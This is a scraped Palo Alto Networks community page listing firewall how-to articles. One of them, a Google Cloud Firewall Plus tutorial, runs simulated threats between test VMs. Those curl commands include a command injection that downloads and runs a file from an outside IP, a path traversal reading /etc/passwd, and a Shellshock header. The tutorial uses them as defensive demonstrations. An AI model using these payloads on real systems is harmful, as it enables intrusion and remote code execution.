General Articles
LIVEcommunity's General Articles area is home to how-to resources, technical documentation, and discussions with Accepted Solutions that turn into articles related to all Palo Alto Networks products.
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Announcements
Please sign in to see details of an important advisory in our Customer Advisories area.
About General Articles
LIVEcommunity's General Articles area is home to how-to resources, technical documentation, and discussions with Accepted Solutions that turn into articles related to all Palo Alto Networks products.
This Nominated Discussion Article is based on the post "FIPS-CC Mode Initial Setup" by @B.Vance and answered by Cyber Elites @BPry & @OtakarKlier 
View full article
Customers With a CSP Account Who Are New to LIVEcommunity   Instructions: Log into Customer Support Portal (CSP): support.paloaltonetworks.com/ Go to LIVEcommunity. This can be done two ways: Option 1  Select "Resources" from the left-aligned menu of the CSP homepage Click on "LIVEcommunity" Click the "Sign In" button at the top right-hand side of the LIVEcommunity homepage If you are logged into CSP, you will automatically be logged into LIVEcommunity  Option 2 Go to the LIVEcommunity homepage (https://live.paloaltonetworks.com/)  Click "Sign In" in the upper-righthand corner If you are logged into CSP, you will automatically be logged into LIVEcommunity    LIVEcommunity Users Who Are Registering With CSP for the First Time  Instructions: Register with the Customer Support Portal (CSP) using one of two methods: Have your company Superuser create an account for you OR Self-register by following this guide: How to Create Your Customer Support Portal User Account Then: Go to LIVEcommunity and select the "Sign In" button You will be automatically logged in using SSO You will then be able to see customer content in LIVEcommunity  Note: If you have more than one LIVEcommunity account, please reach out to community@paloaltonetworks.com to have them merged.   Customers Who Are New to Both CSP and LIVEcommunity Instructions: Register with the Customer Support Portal (CSP) using one of two methods: Have your company Superuser create an account for you OR Self-register using this guide: How to Create Your Customer Support Portal User Account Once registered and logged in to CSP, either: Click on the "Resources" option on the left-hand side menu and select LIVEcommunity OR Follow this link to LIVEcommunity and select "Sign In" in the upper-righthand corner. You will be automatically logged in using SSO.   You can read more in LIVEcommunity's FAQ.
View full article
A Nominated Discussion on implementing automatic safeguards for GlobalProtect against brute force attacks.
View full article
This Nominated Discussion Article is based on the post "Internet -> PA-440 -> ASUS RT-AX53U AX1800. Error = Router does not get Internet access " by @SoloSigma  and answered by Cyber Elite @reaper.
View full article
Digging into the depths of policy details can be quite the task, especially after a long and tiring day. But fear not, handy search tools are here to lighten your load!
View full article
This Nominated Discussion Article is based on the post "How to Renew Global Protect VPN certificate signed by third party vendor? " by @tthapa23  and answered by Cyber Elite @aleksandar.astardzhiev! 
View full article
Organizations often use Google Cloud’s Application Load Balancer to distribute HTTP/HTTPS traffic to VM-Series firewalls deployed within Google Cloud.   Diagram 1 In this setup, the Application Load Balancer functions as a proxy, altering the client's source address before forwarding the request to the VM-Series for security inspection. This may present challenges for organizations defining security policies based on the client's address or requiring IP preservation for backend applications protected by the VM-Series.   Using XFF Headers with PAN-OS Within PAN-OS, the firewalls can be configured to use the source address of an X-Forwarded-For (XFF) header to enforce security policy.  When configured, the firewall applies policy based on the address that was most-recently added to the XFF field.   However, when using the Application Load Balancer, this approach alone will not work.  This is because the load balancer appends two addresses to the XFF header, where the <load-balancer-ip> is the most-recent address within the header and the <client-ip> is the next-to-last address.     X-Forwarded-For: <client-ip>, <load-balancer-ip>     Solution Within the backend service configuration of the Application Load Balancer, you can define custom headers to make the client address the most-recently added address to the XFF field. When used, the load balancer preserves the supplied value of the custom header before the <client-ip>, <load-balancer-ip> addresses.       X-Forwarded-For: <supplied-value>, <client-ip>, <load-balancer-ip>     To insert the client’s address as the supplied value, you can use the client_ip_address header variable.  This variable contains the client’s IP address, and has the same value as the <client-ip> address.  Once configured, the VM-Series can then use the client’s address to enforce policy.   Diagram 2   Steps to Implement The steps below outline how to add the client_ip_address value as a custom header to an existing Application Load Balancer that uses the VM-Series as its backend service.   Adding Custom Request Header to Backend Service 1. In Google Cloud, go to Network Services → Load Balancing.  Select your Application Load Balancer and click Edit.   2. Select Backend Configuration and click the edit icon next to the backend service.  Selecting backend   3. Under Advance Configurations → Custom Request Headers, click Add Header.    4. Set the header name to X-Forwarded-For and the header value to {client_ip_address} . Adding customer header   5. Click Update to apply the changes.      Configure VM-Series for XFF Headers 1. On the VM-Series, go to Device → Setup → Content-ID → X-Forwarded-For Headers.   2. Set Use X-Forwarded-For Header to  Enabled for Security Policy . Enabling XFF for policy.   3. Commit the changes.   View Traffic Logs Once the changes have been applied, you can view the value of the client_ip_address header within the firewall's traffic logs.    1. Simulate traffic flows through the Application Load Balancer to your application.    2. Go to Monitor → Traffic and add the X-Forwarded-For IP field to the log view. Log viewer.   The traffic logs should now contain the client's IP address under the X-Forwarded-For IP column.  This address can then be used as the source address within the VM-Series security policies.    Traffic logs
View full article
This Nominated Discussion Article is based on the post "Move Firewall to New Panorama " by @securehops  and answered by Cyber Elite @TomYoung
View full article
This Nominated Discussion Article is based on the post "HSCI and HA " by @Ramakrishnan  and answered by @reaper & @aleksandar.astardzhiev .     Folks, I would like understand the difference between HSBI and HA1, HA1B, HA2, HA2B  As per my understanding HA1 for control & HA1B for backup link HA2 for data & HA2B for backup link  control carries  heartbeats and communication  Dara traffic carries Ip table, arp table, session table? Is that correct?   For state full session sync up we “must” use HSBI link? Or it can be used for over HA2?   I have little expertise in PA, but I never see such implementation? can you please clarify? your swift response is much appreciated  Response:    HA1 is the 'brains' of the HA cluster, sharing configuration, routing information, control messages to see if the peer is alive and functional, etc.  HA1b is a backup link (if for some reason HA1 is disconected but both firewalls are still fully functional, they will assume the remote peer is down and both start accepting packets at the same time, this is not fun to have happen, so make sure to set up HA1b)   HA2 is where the session table gets synced so if a firewall goes down the perr can pick up existing sessions ha2b is the backup link you are not required to use the HSCI link, you can assign the type 'HA' to dataplane interfaces and use those instead you cannot use HSCI for HA1 connections, but you should either use the dedidicated HA1a/HA1b, the AUX1/AUX2, or dataplane interfaces (dedicated links preferred)     Please check the following documentations - https://docs.paloaltonetworks.com/hardware/pa-1400-hardware-reference/pa-1400-series-overview/front-panel-1400-series  https://docs.paloaltonetworks.com/pan-os/10-1/pan-os-admin/high-availability/ha-concepts/ha-links-and-backup-links/ha-ports-on-the-pa-7000-series-firewall HSCI is high speed interface, which main purpose is to be used for HA2. As @reaper  already mentined HA2 is data link, it is used to sync session information between the two HA members. (and also forward traffic in case you use active/active). So if you have the physical capability to connect both member directly (no routers, no switches, no other intermediate devices), it is always recommend to  use the HSCI for HA2.   If you cannot connect both peer directly, you can reserve one of the data plane interfaces for HA and then configure HA2 to use that dataplane interface. By default no dataplane interface is being reserved for HA, that is why when you try to edit HA your dropdown offers only HSCI. Regarding the IP addresses: - As you can see from above links HSCI is layer1 interface, so must use "ethernet" for HA2 transport, which used PAN custom/properiotry ethernet frames which doesn't use IP address. So even if you set some addresses they will be ignored if transport is set to ethernet Transport —Choose one of the following transport options: Ethernet —Use when the firewalls are connected back-to-back or through a switch (Ethertype 0x7261). IP —Use when Layer 3 transport is required (IP protocol number 99). UDP —Use to take advantage of the fact that the checksum is calculated on the entire packet rather than just the header, as in the IP option (UDP port 29281). The benefit of using UDP mode is the presence of the UDP checksum to verify the integrity of a session sync message.   For HA1 you must use IP addresses and you must have different addresses for each member. If you connect them directly you have to specify the same subnet. If they are not connected directly you should configure a gateway which will route between the two networks.  
View full article
New Generation Firewalls are equipped with TPM chips to help secure the devices These systems are designed to "Lockout" after 32 abrupt power down events(Power Failure, Pulling power cord to turn the device down). For every ungraceful shutdown(Power Failure, Pulling power cord to turn the device down).the TPM counter is incremented by 1 , after 32 such events the device goes into Lockout mode. Once the system is in lockout mode , the system will not boot properly. For systems with encrypted drives, the system will stay at BIOS level. For systems with non-encrypted drives, it will boot into maintenance mode For the system to recover, keep the system powered on for at least two hours. For systems with encrypted drives, the system will auto-reboot and should come back up properly. For systems with non-encrypted drives, perform a reboot from the maintenance mode For every two hours the device is powered on, the TPM lockout counter will be decremented by one To make sure that the device does not go into lockout mode make sure that the device has proper power and when ever we need to turn the device off make sure we are doing so gracefully by navigating to the option and turning the device off using the power down option Follow the steps outlined in this Document to perform a graceful shutdown from the operational cli/GUI when ever you want to power the device down 
View full article
This Nominated Discussion Article is based on the post "Basic Question about DNS Query".
View full article
This Nominated Discussion Article is based on the post "How to view correlated logs on the FW ?" by @JeffersonDias and replied to by @kiwi, @OtakarKlier, @Terje_Lundbo    I currently have an environment with TP, GP, ADVURL and WF and sometimes I need to see the full info of a user instead of going to traffic and check some portion then go to URL filtering and find something "maybe" related and so on.   I keep getting results of using ACC but even there it is split in tabs, so I can check traffic but then I need to switch to threats to see some more.   Is there a way even via ACC to create a view that shows everything related to that traffic?   If you go to the detailed log view you'll get related logs for the same session at the bottom. Notice how this example shows the related url logs and threat logs (identified by the TYPE column) at the bottom for the selected traffic log:     In addition to that you can look at the Unified logs. This combines the Traffic, URL, and Threat logs into the same view. Then when you find the log you wish to drill down into, click the Magnifying glass icon.     You can control which logs are shown in Unified by clicking on the two down arrows to the left of the query field and choose your log types. To get reasonable quick responses I have been advised by TAC to limit the log types to maximum 3.     In addition to this, if you put a date and time then a great then feature, this will also speed things up.    ( receive_time geq '2023/10/06 00:00:00' ) will filter on any logs created after 12am on Oct 10.
View full article
Factory resetting your firewall is a drastic step that should only be taken when necessary and with careful consideration. It's important to note that a factory reset should not be taken lightly, as it will erase all configurations and data on the firewall. If you decide factory resetting is the route you need to take, make sure to back up your existing configuration and keep a tech support file on hand for that device.   Steps to Factory Reset Your VM-Series Firewall   1. Login to the CLI and enter the following command: debug system maintenance-mode Once entered, your VM-Series will reboot.        2. Continue maintenance mode and select "Factory Reset"        3. Select and enter while on "Factory Reset". Your firewall will then go through the reset process.     4. Once complete, select and enter on "Reboot".      Your VM-Series Firewall will then reboot normally and you will have a fresh image of PAN-OS. Please wait for the "PA-VM:" login prompt to enter the default credentials. 
View full article
This Nominated Discussion Article is based on the post "What do you people's think of this script?" by @hfakoor2    I wrote a Python script that returns the differences in policies across firwealls. Here's the github description:   Firewall policies contain object groups, hundreds of ip addresses and ACL's, services, address objects etc. This script compares a set of firewall policies with the same name, across many firewalls, and return differences in services, source/destination, address objects, ACL's etc, to a Python dictionary. We use a XML path api call to obtain the configuration files, so no need for token authentication. The script also returns object groups that exist in one firewall and not the other. So if your firewalls have similar named policies with dozens of rules, this script can save time in validating the policies by hand.   There's  video of the code running against 10.0.4 vm_eval editions.  https://github.com/hfakoor222/Palo_Alto_Scripting/tree/master   the code is under folder compare_Object_ACL's   Please let me know what you think, and where I can improve on.   Also like or follow my github page for more scripts Thanks!   That is a very nice script!   If someone were going to use your script in production, then I would store the username and password (or API keys) in local environment variables and not the script.  That is not required, but definitely a best practice especially if they use Git or another development platform where the code is shared.  Your scripts have the default usernames and passwords.  So, no sensitive information is exposed in your example.   Great job!  
View full article
  Packet Buffer Protection is one of the first lines of defense. Find out why it's important and how it can improve your security posture.
View full article
This is a guide that shows how to deploy and use Google Cloud Firewall Plus, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.    Cloud Firewall is a fully distributed firewall service with advanced protection capabilities, micro-segmentation, and pervasive coverage to protect your Google Cloud workloads from internal and external threats, including: intrusion, malware, spyware, and command-and-control. The service works by creating Google-managed zonal firewall endpoints that use packet intercept technology to transparently inspect the workloads for the configured threat signatures and protect them against threats.   Diagram     ℹ️ Note Cloud Firewall Plus is currently in public preview. For the most recent version of this guide, please see the Google Cloud Firewall Plus Tutorial github repository.    Requirements Familiarize yourself with the Cloud Firewall Plus. A valid  gcloud  (SDK  447.0.0  or greater) installation or access to Google Cloud Shell. A Google Cloud project with Organizational admin access.   Topology Below is a diagram of the environment.  A VPC network contains two virtual machines ( attacker  and  victim ) that are used to simulate threats. Each virtual machine has an external address associated with its network interface to provide internet connectivity.   When Cloud Firewall Plus is enabled, Google Cloud firewall rules intercept VPC network traffic (including north-south and east-west) and redirect it to the Firewall Plus endpoint for inspection. All actions taken by the service are logged directly in the Google Cloud console for you.   Topology   Prepare for deployment Prepare for deployment by enabling the required APIs, retrieving the deployment files, and configuring the environment variables. 1. Open Google Cloud Shell and enable the required APIs. gcloud services enable compute.googleapis.com gcloud services enable networksecurity.googleapis.com   2. List your Organization ID(s). gcloud organizations list   3. Set the desired Organization ID to the environment variable  ORG_ID . export ORG_ID=ORGANIZATION_ID   4. List your projects within the organization. gcloud alpha projects list --organization=$ORG_ID   5. Set the desired Project ID to the environment variable PROJECT_ID . export PROJECT_ID=PROJECT_ID   6. Set your Project ID to your gcloud configuration. gcloud config set project $PROJECT_ID   7. Set values for the deployment's REGION ,  ZONE , and naming  PREFIX . export REGION=us-central1 export ZONE=us-central1-a export PREFIX=panw   8. Select a deployment option.  Both options deploy identical environments.  Scripted Deployment All of the cloud resources required for the tutorial are deployed using a single script. Best for users who are familiar with Cloud Firewall Plus and want to quickly test use-cases. Step-by-step Deployment Each cloud resource is deployed individually through  gcloud . Best for users who are new to Cloud Firewall Plus or want control over which resources are deployed.   Scripted Deployment   1. In Cloud Shell, clone the repository and change directories. git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial cd google-cloud-firewall-plus-tutorial   2. Execute the script to create the environment. ./ips_create.sh   3. When the script completes, proceed to Simulate Threats.   Step-by-Step Deployment   1. In Cloud Shell, create a VPC network, subnetwork, and firewall rule to allow ingress traffic. gcloud compute networks create $PREFIX-vpc \ --subnet-mode=custom \ --project=$PROJECT_ID gcloud compute networks subnets create $PREFIX-subnet \ --network=$PREFIX-vpc \ --range=10.0.0.0/24 \ --region=$REGION \ --project=$PROJECT_ID gcloud compute firewall-rules create $PREFIX-all-ingress \ --network=$PREFIX-vpc \ --direction=ingress \ --allow=all \ --source-ranges=0.0.0.0/0 \ --project=$PROJECT_ID   2. Create two virtual machines ( attacker  &  victim ).  The machines will be used to simulate sudo-threats later. gcloud compute instances create $PREFIX-attacker \ --zone=$ZONE \ --machine-type=f1-micro \ --image-project=ubuntu-os-cloud \ --image-family=ubuntu-2004-lts \ --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.10 \ --project=$PROJECT_ID gcloud compute instances create $PREFIX-victim \ --zone=$ZONE\ --machine-type=f1-micro \ --image-project=panw-gcp-team-testing \ --image=debian-cloud-ids-victim \ --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.20 \ --project=$PROJECT_ID   3. Create a security profile and a security profile group. gcloud beta network-security security-profiles threat-prevention create $PREFIX-profile \ --location=global \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet gcloud beta network-security security-profile-groups create $PREFIX-profile-group \ --threat-prevention-profile "organizations/$ORG_ID/locations/global/securityProfiles/$PREFIX-profile" \ --location=global \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet   4. Set the security profile's action to  ALERT  for threat severities categorized as  INFORMATIONAL  and  LOW , while setting it to  BLOCK  for those categorized as  MEDIUM ,  HIGH , and  CRITICAL . gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \ --severities=INFORMATIONAL,LOW \ --action=ALERT \ --location=global \ --organization=$ORG_ID \ --project=$PROJECT_ID gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \ --severities=MEDIUM,HIGH,CRITICAL \ --action=DENY \ --location=global \ --organization=$ORG_ID \ --project=$PROJECT_ID   5. Create a Firewall Plus Endpoint.  The endpoint can take up to 25 minutes to fully provision.  gcloud beta network-security firewall-endpoints create $PREFIX-endpoint \ --zone=$ZONE \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet while true; do STATUS_EP=$(gcloud beta network-security firewall-endpoints describe $PREFIX-endpoint \ --zone=$ZONE \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --format="json" | jq -r '.state') if [[ "$STATUS_EP" == "ACTIVE" ]]; then echo "Firewall endpoint $PREFIX-endpoint is now active." sleep 2 break fi echo "Waiting for the firewall endpoint to be created. This can take up to 25 minutes..." sleep 5 done   6. Associate the endpoint with a VPC network.  The association can take up to 30 minutes to complete. gcloud beta network-security firewall-endpoint-associations create $PREFIX-assoc \ --endpoint "organizations/$ORG_ID/locations/$ZONE/firewallEndpoints/$PREFIX-endpoint" \ --network=$PREFIX-vpc \ --zone=$ZONE \ --project=$PROJECT_ID \ --quiet while true; do STATUS_ASSOC=$(gcloud beta network-security firewall-endpoint-associations describe $PREFIX-assoc \ --zone=$ZONE \ --project=$PROJECT_ID \ --format="json" | jq -r '.state') if [[ "$STATUS_ASSOC" == "ACTIVE" ]]; then echo "Endpoint association $PREFIX-assoc is now active." sleep 2 break fi echo "Waiting for the endpoint association to be created. This can take up to 45 minutes..." sleep 1 done   7. Create a Network Firewall Policy with two firewall rules to allow all ingress & egress traffic to the workload network.  gcloud compute network-firewall-policies create $PREFIX-global-policy \ --global \ --project=$PROJECT_ID gcloud compute network-firewall-policies rules create 10 \ --action=allow \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --direction=INGRESS \ --enable-logging \ --layer4-configs all \ --src-ip-ranges=0.0.0.0/0 \ --dest-ip-ranges=0.0.0.0/0\ --project=$PROJECT_ID gcloud compute network-firewall-policies rules create 11 \ --action=allow \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --layer4-configs=all \ --direction=EGRESS \ --enable-logging \ --src-ip-ranges=0.0.0.0/0 \ --dest-ip-ranges=0.0.0.0/0 \ --project=$PROJECT_ID   8. Associate the Network Firewall Policy with the VPC network created previously.  gcloud compute network-firewall-policies associations create \ --firewall-policy=$PREFIX-global-policy \ --network=$PREFIX-vpc \ --name=$PREFIX-global-policy-association \ --global-firewall-policy   9. (Optional) Review the created resources. Firewall Endpoint Firewall Endpoint VPC Network Association Security Profile Network Firewall Policy   Simulate threats without Cloud Firewall Plus Simulate several threats between the  attacker  and  victim  virtual machines without Cloud Firewall Plus inspection. Deep packet inspection does not occur because the firewall policies created in the previous step do not intercept traffic for inspection by the Firewall Plus endpoint.   Without inspection   1. In Cloud Shell, open an SSH session to the  attacker  VM. gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID   2. From the  attacker  VM, simulate sudo-threats to the  victim ( 10.0.0.20 ) VM. curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil" curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5 curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5 curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5   3. Attempt to download a sudo-malicious file from the internet. wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2   💡 Objective The above threat simulations should be successful. This is because the Firewall Endpoint is not inspecting the traffic between the  attacker  and  victim  virtual machines.   Prevent threats with Cloud Firewall Plus Cloud Firewall Plus uses Google Cloud's packet intercept technology to transparently redirect traffic from workloads to firewall endpoints. Traffic redirection is defined within network firewall rules that reference the security profile group.   Update network firewall policies Update the network firewall policies to redirect traffic to the firewall endpoint.  The action defined in the firewall rule determines which security profile group is applied to the traffic.    With inspection via Traffic Intercept   1. Modify the ingress & egress firewall rules within the global network policy to intercept traffic to the Firewall Plus endpoint. gcloud beta compute network-firewall-policies rules update 10 \ --action=apply_security_profile_group \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --project=$PROJECT_ID \ --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group gcloud beta compute network-firewall-policies rules update 11 \ --action=apply_security_profile_group \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --project=$PROJECT_ID \ --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group   Replay threats Rerun the previous threats again to see the actions taken by Cloud Firewall Plus.   1. In Cloud Shell, open an SSH session to the  attacker  VM. gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID   2. From the  attacker  VM, simulate sudo-threats to the  victim ( 10.0.0.20 ) VM. curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil" curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5 curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5 curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5   3. Attempt to download a sudo-malicious file from the internet. wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2   💡 Objective The simulated threats from the  attacker  should fail. This is because the Firewall Plus service is preventing the exploits from reaching the  victim  machine.   View threats All of the actions taken by Cloud Firewall Plus are logged directly to the Google Cloud console for you.  These logs can be forwarded to Cortex XSIAM for further forensic investigation and action.   1. In the Google Cloud console, go to Network Security → Threats.   Cloud logs   💡 Objective You should see the actions taken by the Firewall Plus endpoint, indicating the service has detected and/or stopped the simulated threats.  The action taken against a threat is determined by the security profile group applied to the network firewall rule.   Clean up To delete the created resources, delete your Google Cloud deployment project. If you cannot delete your deployment project, follow the steps below to delete the resources created in this tutorial.   1. If you chose the Step-by-Step Deployment, clone the repository to Cloud Shell.  git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial cd google-cloud-firewall-plus-tutorial    2. Execute the script to delete the created resources. ./ips_delete   More Information Please see the materials below for more information about the topics discussed in this tutorial. Announcement Palo Alto Networks with Google Cloud Firewall Palo Alto Networks with Google Cloud Cloud Firewall Plus Overview Configure Intrusion Prevention Service
View full article
This Nominated Discussion Article is based on the post "What would this number be at the end of some signatures?" by @filipe.r.oliveira and answered by myself, JayGolf!   Guys, I saw that there is a different number sometimes in the same signature. What would that be? what is it for? Is there any documentation talking about it? If I block the subscription with a number and another one appears with another number, do I have to do this blocking too or do these numbers not interfere with the subscription blocking and just put the name? example: 1- DESCRIPTION AndroxGh0st Scanning Traffic Detection(86759)  2- DESCRIPTION AndroxGh0st Scanning Traffic Detection(86760) If you can help me with these questions, please! Thank you for your attention!   Accepted Solution:     Hi @filipe.r.oliveira,   These numbers represent the version number of the signature. In this case, "DESCRIPTION AndroxGh0st Scanning Traffic Detection(86760)" is the later version of the signature.  You don't need to manually block each version as the latest threat updates include the most recent signatures.   
View full article
This Nominated Discussion Article is based on the post " Confused about QoS on Palo, need some assistance".
View full article
This Nominated Discussion Article is based on the post "Migrating PA-5050 to PA-5410".
View full article
In this article, we will look at how to identify the VM-Series versions based on the PAN-OS version and licensing model, how to deploy a specific version of VM-Series and then also how we can deploy the same through automation.  
View full article
This blog outlines the best practices for upgrading the VM series firewalls in AWS.  
View full article
This Nominated Discussion Article is based on the post "What cloud services are affected by CVE-2020-1982?".
View full article
The connection between the Prisma Access Cloud and the on-prem devices is usually based on the IPSEC protocol for site to site VPNs. For extra security, configure Prisma Access to be the VPN responder and the on-prem firewall/router as the VPN initiator.
View full article
This article provides the steps to setup, demonstrate and teardown the Palo Alto Networks' VM-Series Next Generation Firewalls on AWS in integration with the AWS Gateway Load Balancer.  
View full article
This article describes the best practices for sizing Palo Alto Networks' VM-Series Next Generation Firewalls deployed on Google Cloud. Proper sizing of the deployment is very important because it provides an fairly accurate picture of how many firewalls would be needed to handle the customer’s traffic.  
View full article
This Nominated Discussion Article is based on the post "External DHCP Configuration".
View full article
Digitization has revolutionized banking, empowering fintech firms to offer innovative services. Banks collaborate with fintech companies to enhance offerings and reach more customers. This shift is driven by the need to adapt to scalability and resiliency requirements.  
View full article
This Nominated Discussion Article is based on the post "Palo Alto Cluster Questions".
View full article
This Nominated Discussion Article is based on the post "Cant Download Panorama for esx ova".
View full article
This Nominated Discussion Article is based on the post "Test command does not work".
View full article
  • 180 Posts
  • 255 Subscriptions
Customer Advisories

Your security posture is important to us. If you’re a Palo Alto Networks customer, be sure to login to see the latest critical announcements and updates in our Customer Advisories area.

Learn how to subscribe to and receive email notifications here.

Listen to PANCast

PANCast is a Palo Alto Networks podcast that provides actionable insights to customers, helping you maximize your investment while improving your cybersecurity posture.

Labels
Top Contributors
Top Liked Posts in LIVEcommunity Article
Top Liked Authors